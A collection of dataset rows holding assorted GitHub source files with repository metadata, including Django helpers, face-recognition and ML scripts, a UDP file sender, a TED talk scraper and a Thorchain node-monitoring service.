71bad8fd989996259745fc43343f9736f7276d00
|
a76ffb5304f686254dddf824a04c2afdf70d37f8
|
/solidworksDv/solidworks_api_doc.py
|
07f8554135643d2d5907763dcff3d231573710e0
|
[] |
no_license
|
openmc/SmartTool-Machanical-Design
|
b3b6f8bd711620081fa6deddbce449eb72ae2fcc
|
145494a05569bb18fc656e0636740a5fe572a063
|
refs/heads/master
| 2020-05-23T04:08:36.060530
| 2019-12-13T13:39:58
| 2019-12-13T13:39:58
| 186,629,542
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 395
|
py
|
import win32com.client
#连接solidworks对象
swapp = win32com.client.Dispatch("sldworks.Application")
#窗口可见(窗口显示、隐藏)
visible = swapp.visible
#打开文件-参数(文件路径名称,1)
open_file = swapp.OpenDoc(r"path + part_name", 1)
#实例化活动文档
part = swapp.ActiveDoc
#活动文档另存为
new_name = part.SaveAs3(r"path + part_name", 0, 2)
|
[
"252284222@qq.com"
] |
252284222@qq.com
|
3ac62a3397c426d97772c5dab0060e573d15e0c9
|
f3edace90016b25ae7044d323d7b5754a322ea72
|
/tests/infra/__init__.py
|
206dcad2661a8be2b86fd948794db5422f346b7a
|
[
"MIT"
] |
permissive
|
HumanCellAtlas/flash-flood
|
b60871af5fa0f310c6e4df8c4d71fee50dbd4986
|
f1de428ee11eac5bd40b47dec1b22b59519e52f9
|
refs/heads/master
| 2020-06-17T22:06:43.559204
| 2020-02-20T18:17:14
| 2020-02-20T18:17:14
| 196,073,836
| 0
| 1
|
MIT
| 2020-10-08T18:26:28
| 2019-07-09T19:49:50
|
Python
|
UTF-8
|
Python
| false
| false
| 197
|
py
|
import os
def get_env(varname):
if varname not in os.environ:
raise RuntimeError(
"Please set the {} environment variable".format(varname))
return os.environ[varname]
|
[
"noreply@github.com"
] |
HumanCellAtlas.noreply@github.com
|
85d7b4b367337c675e06d6a6a4635eb8333bc0b3
|
b6f8b88672cd9d7f6ce21c14a6abd726e6521047
|
/pinax/projects/sample_group_project/apps/basic_groups/templatetags/basic_group_tags.py
|
d0706e98556d871b05540f8f66aadc74df78c098
|
[] |
no_license
|
jipan25/linkedby
|
778b10ff794cf623adebb06e438f3fdc0324cd38
|
ca9ed7ebdfd760a19d3123987a5e508f73d54629
|
refs/heads/master
| 2016-09-06T10:08:28.071487
| 2011-09-17T04:05:04
| 2011-09-17T04:05:04
| 2,403,258
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 742
|
py
|
from django import template
from basic_groups.forms import BasicGroupForm
register = template.Library()
@register.inclusion_tag("basic_groups/group_item.html")
def show_group(group):
return {"group": group}
# @@@ should move these next two as they aren't particularly group-specific
@register.simple_tag
def clear_search_url(request):
getvars = request.GET.copy()
if 'search' in getvars:
del getvars['search']
if len(getvars.keys()) > 0:
return "%s?%s" % (request.path, getvars.urlencode())
else:
return request.path
@register.simple_tag
def persist_getvars(request):
getvars = request.GET.copy()
if len(getvars.keys()) > 0:
return "?%s" % getvars.urlencode()
return ''
|
[
"jipan250@163.com"
] |
jipan250@163.com
|
c0fe5f7abe74fa620bf07936184bec1c57bcb8fb
|
c2860f01fe0b56b63d0112d94132304c8ad1a29b
|
/ecommerce/accounts/migrations/0004_remove_user_active.py
|
bfaf289c33012bc02924f662fa3ffe715e23f19e
|
[] |
no_license
|
TarekCsePust/Ecommerce-With-Django-Framework-Postgresql
|
63194b1e322d9281ce7008a45ddf1482a34c9a64
|
50d2172f3c6d2f1a5652afb765e03064edd07e52
|
refs/heads/master
| 2020-04-02T04:37:59.006110
| 2019-01-24T07:17:04
| 2019-01-24T07:17:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 323
|
py
|
# Generated by Django 2.0.7 on 2018-08-29 14:27
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('accounts', '0003_user_is_active'),
]
operations = [
migrations.RemoveField(
model_name='user',
name='active',
),
]
|
[
"hasantarek12cse@gmail.com"
] |
hasantarek12cse@gmail.com
|
f32cd92673d58e130c5850aa8213e76211644549
|
d21e217aeb1876edd4b5343432c45ec1e33ee46f
|
/yalefaces/yalefaces/mypackage/OlivettiDataset/mypackage/download_olivetty_faces.py
|
38740921ffd262c92ba441ea7ef6654ab6c8e608
|
[] |
no_license
|
swoichha/FaceRecognition
|
e0a7976fdff0bbc56277b03066cba188261954bb
|
0f8ffd8bcfba9e17db52dae8fe66e8f5d50f08f9
|
refs/heads/master
| 2020-05-07T13:41:14.661561
| 2019-11-04T12:26:31
| 2019-11-04T12:26:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,646
|
py
|
# Imports
import cv2
import os
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from PIL import Image
from numpy import linalg as LA
# from showFaces import show_40_distinct_people, show_10_faces_of_n_subject
from sklearn.metrics import classification_report
#Machine Learning
from sklearn.model_selection import train_test_split
from sklearn.decomposition import PCA
from sklearn.svm import SVC
from sklearn.naive_bayes import GaussianNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn import metrics
from time import time
from readImages import readFiles
from faceRecognition import faceRecog
from weights import weight
import warnings
warnings.filterwarnings("ignore", category=FutureWarning)
imageArray = ''
def getAccuracy():
data=np.load("../mypackage/olivetti_faces.npy")
target=np.load("../mypackage/olivetti_faces_target.npy")
# print("There are {} images in the dataset".format(len(data)))
# print("There are {} unique targets in the dataset".format(len(np.unique(target))))
# print("Size of each image is {}x{}".format(data.shape[1],data.shape[2]))
# print("Pixel values were scaled to [0,1] interval. e.g:{}".format(data[0][0,:4]))
# print("unique target number:",np.unique(target))
# show_40_distinct_people(data, np.unique(target))
#You can playaround subject_ids to see other people faces
# show_10_faces_of_n_subject(images=data, subject_ids=[0,5, 21, 24, 36])
# plt.show()
print("X shape:",data.shape)
#We reshape images for machine learnig model
X=data.reshape((data.shape[0],data.shape[1]*data.shape[2]))
print("X shape:",X.shape)
X_train, X_test, y_train, y_test=train_test_split(X, target, test_size=0.3, stratify=target, random_state=0)
print("X_train shape:",X_train.shape)
print("y_train shape:{}".format(y_train.shape))
dim = np.shape(X_train)
imageCount, total_pixels = dim
global normalizeFaceVector
normalizeFaceVector = np.zeros((imageCount, total_pixels), order='C')
def averageOfArray(x,total):
x = np.sum(x, axis = 0)
x = (x/total)
return x
averageImage = averageOfArray(X_train,imageCount)
# ------------------Ploting image from imageArray------------------------------
resizedAverageImage = np.reshape(averageImage,(64,64))
# plt.imshow(resizedAverageImage,cmap='gray')
# plt.show()
cum_var_exp, eig_pairs,normalizeFaceVector = faceRecog(X_train,imageCount,averageImage,normalizeFaceVector)
#k is equals to the n_componet of pca
k=0
for i in range(len(cum_var_exp)):
if cum_var_exp[i] < 95:
k = k+1
matrix_w = np.zeros((k,280))
#------storing lower dimensionality k eigenvectors into matrix_w-----------
for i in range(k):
matrix_w[i] = np.array(eig_pairs[i][1].reshape(1,280))
matrix_wT = matrix_w.transpose()
#-----------converting lower dimension k eigenvectors to original face dimensionality---------------------
Y = normalizeFaceVector.dot(matrix_wT)
k_eigenVector = np.transpose(Y)
# for i in range(len(k_eigenVector)):
# resized_eigenvector = np.array(np.reshape(k_eigenVector[i],(64,64)), dtype=float)
# plt.imshow(resized_eigenvector,cmap='gray')
# plt.show()
weight_coeff = weight(k_eigenVector,normalizeFaceVector,0)
X_train_pca = weight_coeff
# Initialize Classifer and fit training data
clf = SVC(kernel='rbf',C=10000,gamma=0.000001)
clf = clf.fit(X_train_pca, y_train)
print(k)
normalizeTestImg = X_test - averageImage
normalizeTestImg = normalizeTestImg.transpose()
testImgWeight = weight(k_eigenVector,normalizeTestImg,1)
print(testImgWeight.shape)
testImgWeightT = testImgWeight.transpose()
X_test_pca = testImgWeightT
y_pred = clf.predict(X_test_pca)
print("accuracy score:{:.2f}".format(metrics.accuracy_score(y_test, y_pred)))
print("Classification Results:\n{}".format(metrics.classification_report(y_test, y_pred)))
models=[]
models.append(('LDA', LinearDiscriminantAnalysis()))
models.append(("SVM",SVC(kernel='rbf',C=10000,gamma=0.000001)))
models.append(("LR",LogisticRegression()))
models.append(("NB",GaussianNB()))
models.append(("KNN",KNeighborsClassifier(n_neighbors=5)))
models.append(("DT",DecisionTreeClassifier()))
for name, model in models:
clf = model
clf.fit(X_train_pca, y_train)
y_pred = clf.predict(X_test_pca)
print(10*"=","{} Result".format(name).upper(),10*"=")
print("Accuracy score:{:0.4f}".format(metrics.accuracy_score(y_test, y_pred)))
print()
return
|
[
"swoichhaa@gmail.com"
] |
swoichhaa@gmail.com
|
3d35f7af891ce8ed8f8832aba3e969c4d237016d
|
3dabb35484171f7bae4a6dcd9773380ea2f90782
|
/senderFile.py
|
5360c0fecf26329e5063d6929f2a56ede2d0390a
|
[] |
no_license
|
TaglioUltimate/UDP
|
be71a4faeffdf800d6bc05ce241fd49ac168f39e
|
f8ff5e95cbb81328e66515c2ede9d6777f7a618f
|
refs/heads/main
| 2023-01-10T21:53:26.589522
| 2020-11-05T19:38:10
| 2020-11-05T19:38:10
| 310,399,546
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 410
|
py
|
#!/usr/bin/env python
from socket import *
import sys,time
s = socket(AF_INET,SOCK_DGRAM)
host = '10.20.1.8'
port = 8000
buf =20480
file_name=sys.argv[1]
s.sendto((file_name).encode(),(host,port))
f=open(file_name,"rb")
data = f.read(buf)
while (data):
if(s.sendto(data,(host,port))):
print("sending ...")
data = f.read(buf)
#time.sleep(0.1)
s.close()
f.close()
|
[
"noreply@github.com"
] |
TaglioUltimate.noreply@github.com
|
c01d8aa9ceb247202bc06ef202c21b2946e44d06
|
7aa6d0d2e40adac32d06035b3c111746130176c4
|
/QMAX_EAGLE_1500_V_3.0/code_releative/exe.py
|
0d7c1f29d7ba25c2db47c3f5989e6a2e8858d5b0
|
[] |
no_license
|
vimalv-AI/Vimal
|
861dad4c66ea2f875e55a5d67b7bd9f80a753914
|
e6d792bfc0e66555dfcf2217075c3b0dc8b886ea
|
refs/heads/master
| 2021-01-07T07:36:49.094701
| 2020-03-29T14:12:32
| 2020-03-29T14:12:32
| 241,618,603
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 599
|
py
|
import pickle
import glob
import pandas as pd
from natsort import natsorted,ns
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
loaded_model = pickle.load(open('trained_model/eagle_model.yml', 'rb'))
file = natsorted(glob.glob("input_data/*.txt"))
for new in file:
new=pd.read_csv(new,"r",header=None)
Trans=new.T
to_predict=Trans.iloc[:,:].values
y_pred = loaded_model.predict(to_predict)
if y_pred == 1:
print ("The Nut is Tight : ",y_pred)
else:
print ("The Nut is lose : ",y_pred)
|
[
"vsvimal5420@gmail.com"
] |
vsvimal5420@gmail.com
|
62be46a97febe64faaa0c49b7f69414526b062c8
|
5a7aeb54d86a525e1f922d928c4a103c78f4ff88
|
/cli/cli.py
|
a96a07d1e3b86be8067688bc3ef32378cfe6fbbd
|
[] |
no_license
|
Esty-Hirshman/DNA-project
|
a575787fbc1c7f90b58f4effa198c8fae8b2ebb7
|
579e27e431003ab95469e65eac0a8d10fda8ba69
|
refs/heads/main
| 2023-08-03T02:10:40.901565
| 2021-09-12T10:04:31
| 2021-09-12T10:04:31
| 405,606,180
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 245
|
py
|
class CLI:
def __init__(self, prompt):
self.__prompt = prompt
def get_prompt(self):
return self.__prompt
def set_prompt(self, new_prompt):
self.__prompt = new_prompt
def run(self, *args):
raise
|
[
"esty3975@gmail.com"
] |
esty3975@gmail.com
|
f9050427f8574da72fd6c8b067a42a35cdf01c8a
|
d968af7a1f2692667c703409ae6a5a0918592df2
|
/utils.py
|
f339662367600ee293164578c7d41842c9566b7b
|
[] |
no_license
|
cdg720/parsereranker
|
bf55672bdb76d2e356f8357d6aa6a82f0603dd5f
|
5a9af9427c3c3bbe2a065f9357b73fe934522ce4
|
refs/heads/master
| 2021-01-18T22:10:36.357836
| 2017-04-08T20:07:40
| 2017-04-08T20:07:40
| 87,035,213
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,950
|
py
|
import time
import numpy as np
def chop(data, eos):
new_data = []
sent = []
for w in data:
sent.append(w)
if w == eos:
new_data.append(sent)
sent = []
return new_data
def ptb_iterator(raw_data, batch_size, num_steps):
raw_data = np.array(raw_data, dtype=np.int32)
data_len = len(raw_data)
batch_len = data_len // batch_size
data = np.zeros([batch_size, batch_len], dtype=np.int32)
for i in range(batch_size):
data[i] = raw_data[batch_len * i:batch_len * (i + 1)]
epoch_size = (batch_len - 1) // num_steps
if epoch_size == 0:
raise ValueError("epoch_size == 0, decrease batch_size or num_steps")
for i in range(epoch_size):
x = data[:, i*num_steps:(i+1)*num_steps]
y = data[:, i*num_steps+1:(i+1)*num_steps+1]
yield (x, y)
def run_epoch(session, m, data, batch_size, num_steps,
eval_op=None, verbose=False):
"""Runs the model on the given data."""
epoch_size = ((len(data) // batch_size) - 1) // num_steps
start_time = time.time()
costs = 0.0
iters = 0
state = None
for step, (x, y) in enumerate(ptb_iterator(data, batch_size,
num_steps)):
fetches = {"cost": m.cost, "final_state": m.final_state}
if eval_op:
fetches["op"] = eval_op
feed_dict = {}
if state:
feed_dict[m.initial_state] = state
feed_dict[m.input_data] = x
feed_dict[m.targets] = y
feed_dict[m.length] = np.ones(x.shape[0], dtype=np.int) * x.shape[1]
stuff = session.run(fetches, feed_dict)
state = stuff["final_state"]
costs += np.sum(stuff['cost']) / batch_size
iters += num_steps
if verbose and step % (epoch_size // 10) == 10:
print '%.3f perplexity: %.3f speed: %.0f wps' % \
(step * 1.0 / epoch_size, np.exp(costs / iters),
iters * batch_size / (time.time() - start_time))
return np.exp(costs / iters)
def evaluate(session, m, nbest):
"""Runs the model on the given data."""
start_time = time.time()
gold, test, matched = 0, 0, 0
tree_num = 0
steps = 50
for trees, scores, indices in nbest:
costs = np.zeros(trees.shape[0])
state = None
num = (trees.shape[1] - 1) / steps
re = (trees.shape[1] - 1) % steps
if re != 0:
num += 1
start = 0
for i in xrange(num):
fetches = {"cost": m.cost, "final_state": m.final_state}
feed_dict = {}
if i > 0 and state:
feed_dict[m.initial_state] = state
shift = re if re > 0 and i == num - 1 else steps
feed_dict[m.input_data] = trees[:, start:start+shift]
feed_dict[m.targets] = trees[:,start+1:start+shift+1]
feed_dict[m.length] = np.ones(trees.shape[0], dtype=np.int) * shift
stuff = session.run(fetches, feed_dict)
costs += stuff["cost"]
state = stuff["final_state"]
start += shift
prev = 0
for i in indices:
am = np.argmin(costs[prev:i])
gold += scores[am+prev][0]
test += scores[am+prev][1]
matched += scores[am+prev][2]
tree_num += 1
prev = i
return 200. * matched / (gold + test)
def unkify(ws):
uk = 'unk'
sz = len(ws)-1
if ws[0].isupper():
uk = 'c' + uk
if ws[0].isdigit() and ws[sz].isdigit():
uk = uk + 'n'
elif sz <= 2:
pass
elif ws[sz-2:sz+1] == 'ing':
uk = uk + 'ing'
elif ws[sz-1:sz+1] == 'ed':
uk = uk + 'ed'
elif ws[sz-1:sz+1] == 'ly':
uk = uk + 'ly'
elif ws[sz] == 's':
uk = uk + 's'
elif ws[sz-2:sz+1] == 'est':
uk = uk + 'est'
elif ws[sz-1:sz+1] == 'er':
uk = uk + 'ER'
elif ws[sz-2:sz+1] == 'ion':
uk = uk + 'ion'
elif ws[sz-2:sz+1] == 'ory':
uk = uk + 'ory'
elif ws[0:2] == 'un':
uk = 'un' + uk
elif ws[sz-1:sz+1] == 'al':
uk = uk + 'al'
else:
for i in xrange(sz):
if ws[i] == '-':
uk = uk + '-'
break
elif ws[i] == '.':
uk = uk + '.'
break
return '<' + uk + '>'
|
[
"cdg720@gmail.com"
] |
cdg720@gmail.com
|
7ca8bcc022d2ae7195338dc961946fa8c0463027
|
b94fed184633700214c16c9b2187de4c01a65369
|
/task/ted_talk_crawler.py
|
5ad2009dbf95a63f5ca4220a894e1c5c9b47c3e6
|
[] |
no_license
|
Gold900/task_management
|
513ae9b12591ffaeb3fdeebb20934b5e339dc743
|
283494aa767b478f2abc8a5207a250279625f52c
|
refs/heads/master
| 2022-04-13T08:22:17.532514
| 2020-03-27T07:30:58
| 2020-03-27T07:30:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,411
|
py
|
import json
import requests
from bs4 import BeautifulSoup
class TedTalkCrawler:
def __init__(self):
pass
def get_params(self, data):
params = {}
if "sort" in data and data["sort"]:
params["sort"] = data["sort"]
if "topic" in data and data["topic"]:
params["topics[]"] = data["topic"]
return params
def get_headers(self, data):
headers = {}
headers["Content-Type"] = "application/json"
return headers
def main(self, data):
url = "https://www.ted.com/talks"
params = self.get_params(data)
resp = requests.get(url, params)
html = resp.text
soup = BeautifulSoup(html, "html.parser")
browse_res = soup.find(id="browse-results")
tlk_lnks = browse_res.find_all("div", {"class": "talk-link"})
final_res = [{"img": each.find("img")["src"], "speaker": each.find("h4").text,
"title": each.find_all("a", {"class": "ga-link"})[-1].text,
"link": each.find_all("a", {"class": "ga-link"})[-1]["href"],
"meta": each.find("div", {"class": "meta"}).text} for each in tlk_lnks]
json.dump(final_res, open("crawl_res.json", "w"), indent=4)
if __name__=='__main__':
data = {"topic": ["entertainment", "technology"], "sort": "newest"}
OBJ = TedTalkCrawler()
OBJ.main(data)
|
[
"sonaligupta1470@gmail.com"
] |
sonaligupta1470@gmail.com
|
5fa87f79b0f0900e01ca20332e9dd24c211ba119
|
3d23c178dd1d6738766e28e05a5c77162c2c35cb
|
/KIRANA123/asgi.py
|
5e62e94ca1245fe2da7fef9043dda2869baaf1de
|
[] |
no_license
|
giri2510/tryingcss
|
ec0b67c9f7c664e2749ec0dc502e3bda5cabc07b
|
d4fae361986dd20ca25beb682f432078fbe61edc
|
refs/heads/master
| 2022-12-18T16:29:50.987779
| 2020-10-07T07:57:18
| 2020-10-07T07:57:18
| 301,964,651
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 395
|
py
|
"""
ASGI config for KIRANA123 project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'KIRANA123.settings')
application = get_asgi_application()
|
[
"giriahire@gmail.com"
] |
giriahire@gmail.com
|
a2b8c2d58866868509724106c5b1821610bc1541
|
9e78a2864243b7e002a2ea38fa33834d55041a35
|
/mva/computer-vision-and-object-recognition/Finegrained-classification/code/data.py
|
fcd63e28751e8f0d9cd6f8b590f039a44d6ca9e5
|
[] |
no_license
|
ghassenBtb/projects-and-labs
|
31c1a1b8f1e157c98d5d4aff9831ac59c8e6942e
|
d3e9b7729fd35ee360a55fc2462aeef431a838dc
|
refs/heads/main
| 2023-02-04T19:31:12.892693
| 2020-12-28T21:53:55
| 2020-12-28T21:53:55
| 311,183,049
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 868
|
py
|
import zipfile
import os
import torchvision.transforms as transforms
class White_noise():
"""
Add a gaussian noise to image
"""
def __init__(self, level=0.1):
self.level = level
def __call__(self, img):
return img+torch.randn_like(img)*(self.level*np.random.rand())
data_transforms_pretrained = {
'train': transforms.Compose([
transforms.RandomResizedCrop(300),
transforms.RandomHorizontalFlip(),
transforms.ColorJitter(brightness=0.4),
transforms.Lambda(White_noise(level = 0.05)),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
'val': transforms.Compose([
transforms.Resize(300),
transforms.CenterCrop(300),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
}
|
[
"bettaieb.gha@gmail.com"
] |
bettaieb.gha@gmail.com
|
2165b6b232f25cdf32eb3707af8d62e27631b56c
|
88d636e8e2ebbafdbe008be4822d5baa8b9fdded
|
/hist.py
|
20e2eab1175c17f70fcc8f8721736097b42410ce
|
[] |
no_license
|
debadrita0/Mtech-Project
|
5d0558c69759703dbf5d2c5b775f8dc5179fbaf2
|
18ba0fdb0e8024512b49261e24b6da8e72832052
|
refs/heads/main
| 2023-06-19T05:30:40.332720
| 2021-07-15T16:04:08
| 2021-07-15T16:04:08
| 386,347,940
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 804
|
py
|
# import the necessary packages
from skimage import feature
import numpy as np
class LocalBinaryPatterns:
def __init__(self, numPoints, radius):
# store the number of points and radius
self.numPoints = numPoints
self.radius = radius
def describe(self, image, eps=1e-7):
# compute the Local Binary Pattern representation
# of the image, and then use the LBP representation
# to build the histogram of patterns
lbp = feature.local_binary_pattern(image, self.numPoints,
self.radius, method="uniform")
(hist, _) = np.histogram(lbp.ravel(),
bins=np.arange(0, self.numPoints + 3),
range=(0, self.numPoints + 2))
# normalize the histogram
hist = hist.astype("float")
hist /= (hist.sum() + eps)
# return the histogram of Local Binary Patterns
return hist
|
[
"noreply@github.com"
] |
debadrita0.noreply@github.com
|
3f814bc8ef0e2db3fea165db2b5f8cc82bed1135
|
fdf5e70bdaac78296a9af70d64a807f52326fda8
|
/bot/service/thorchain_network_service.py
|
39b6edd1de4c65bf6d80777241885de990d808d2
|
[
"MIT"
] |
permissive
|
Masternode24/thornode-telegram-bot
|
44784ad646933450a122e4a60639f517e2eb3636
|
5f73b882381548f45fc9e690c6e4845def9600b7
|
refs/heads/master
| 2023-04-12T12:32:18.862511
| 2021-04-23T13:22:39
| 2021-04-23T13:22:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,744
|
py
|
import random
from time import sleep
import aiohttp
import requests
from requests.exceptions import Timeout, ConnectionError, HTTPError
from constants.mock_values import thorchain_last_block_mock
from service.general_network_service import get_request_json
from constants.globals import *
from constants.node_ips import *
def get_node_accounts():
path = ":8080/nodeaccounts.json" if DEBUG else ":1317/thorchain/nodes"
return get_request_json_thorchain(url_path=path)
def get_node_status(node_ip=None):
status_path = {
"TESTNET": ":26657/status",
"CHAOSNET": ":27147/status"
}[NETWORK_TYPE]
return get_request_json_thorchain(url_path=status_path, node_ip=node_ip)
def get_latest_block_height(node_ip=None) -> int:
return int(get_node_status(node_ip)['result']['sync_info']['latest_block_height'])
def is_thorchain_catching_up(node_ip=None) -> bool:
return get_node_status(node_ip)['result']['sync_info']['catching_up']
def is_midgard_api_healthy(node_ip) -> bool:
try:
get_request_json_thorchain(url_path=":8080/v2/health", node_ip=node_ip)
except (Timeout, ConnectionError):
logger.warning(f"Timeout or Connection error with {node_ip}")
return False
except HTTPError as e:
logger.info(f"Error {e.errno} in 'is_midgard_api_healthy({node_ip}).")
return False
return True
def get_number_of_unconfirmed_transactions(node_ip) -> int:
unconfirmed_txs_path = {
"TESTNET": ":26657/num_unconfirmed_txs",
"CHAOSNET": ":27147/num_unconfirmed_txs"
}[NETWORK_TYPE]
return int(get_request_json_thorchain(url_path=unconfirmed_txs_path, node_ip=node_ip)['result']['total'])
def get_profit_roll_up_stats(node_address):
profit_rollup = get_request_json(url=THORCHAIN_ONCHAIN_API_URL + f"profit-roll-ups/{node_address}")
parsing_progress = get_request_json(url=THORCHAIN_ONCHAIN_API_URL + f"health")["parsing_progress"]
return profit_rollup, parsing_progress
def get_network_data(node_ip=None):
return get_request_json_thorchain(url_path=f":8080/v2/network", node_ip=node_ip)
def get_thorchain_network_constants(node_ip=None):
return get_request_json_thorchain(url_path=f":8080/v2/thorchain/constants")
def get_thorchain_blocks_per_year(node_ip=None):
constants = get_thorchain_network_constants()
return constants['int_64_values']['BlocksPerYear']
def get_thorchain_blocks_per_second():
return get_thorchain_blocks_per_year() / (365 * 24 * 60 * 60)
def get_thorchain_last_block(node_ip=None):
if DEBUG:
sleep(0.5)
last_block = thorchain_last_block_mock
else:
last_block = get_request_json_thorchain(url_path=f":8080/v2/thorchain/lastblock", node_ip=node_ip)
return last_block[0]['thorchain']
def get_asgard_json() -> dict:
path = ':8080/asgard.json' if DEBUG else f":1317/thorchain/vaults/asgard"
return get_request_json_thorchain(url_path=path)
def get_yggdrasil_json() -> dict:
path = ":8080/yggdrasil.json" if DEBUG else ":1317/thorchain/vaults/yggdrasil"
return get_request_json_thorchain(url_path=path)
def get_pool_addresses_from_any_node() -> dict:
path = ":8080/pool_addresses_1.json" if DEBUG else ":1317/thorchain/inbound_addresses"
return get_request_json_thorchain(path)
async def get_pool_addresses_from_node(node_ip: str):
async with aiohttp.ClientSession() as session:
async with session.get(
f'http://{node_ip}:1317/thorchain/inbound_addresses',
timeout=CONNECTION_TIMEOUT) as response:
if response.status != 200:
raise Exception(
f"Error while getting pool address. " +
"Endpoint responded with: {await resp.text()} \n"
"Code: ${str(resp.status)}")
return await response.json()
def get_request_json_thorchain(url_path: str, node_ip: str = None) -> dict:
if DEBUG:
node_ip = 'localhost'
if node_ip:
return get_request_json(url=f"http://{node_ip}{url_path}{REQUEST_POSTFIX}")
available_node_ips = requests.get(url=SEED_LIST_URL, timeout=CONNECTION_TIMEOUT).json()
random.shuffle(available_node_ips)
for random_node_ip in available_node_ips:
if not is_thorchain_catching_up(random_node_ip):
try:
return get_request_json(url=f"http://{random_node_ip}{url_path}{REQUEST_POSTFIX}")
except Exception:
continue
raise Exception("No seed node returned a valid response!")
def get_thornode_object_or_none(address):
nodes = get_node_accounts()
node = next(filter(lambda n: n['node_address'] == address, nodes), None)
return node
|
[
"noreply@github.com"
] |
Masternode24.noreply@github.com
|
018e4fcbdf2333c3be5a3027fabd3e0b7dbaaa70
|
1c664f387937daf5577f12a05e8201cbad6c2888
|
/env/share/glib-2.0/codegen/config.py
|
20f9cab400f824b6c99cede69fec7e5ac1d52b7e
|
[] |
no_license
|
AdityaApte02/NumpyAndPandas
|
8ddcb692919205ab0a66863e59735c5a86b49c2d
|
7eb41aae4fadb2b44888eca21d984c02e1beaea5
|
refs/heads/main
| 2023-07-14T18:58:00.619773
| 2021-08-26T08:54:39
| 2021-08-26T08:54:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 856
|
py
|
# -*- Mode: Python -*-
# GDBus - GLib D-Bus Library
#
# Copyright (C) 2008-2011 Red Hat, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General
# Public License along with this library; if not, see <http://www.gnu.org/licenses/>.
#
# Author: David Zeuthen <davidz@redhat.com>
VERSION = "2.66.1"
MAJOR_VERSION = 2
MINOR_VERSION = 66
|
[
"aditya02.apte@gmail.com"
] |
aditya02.apte@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.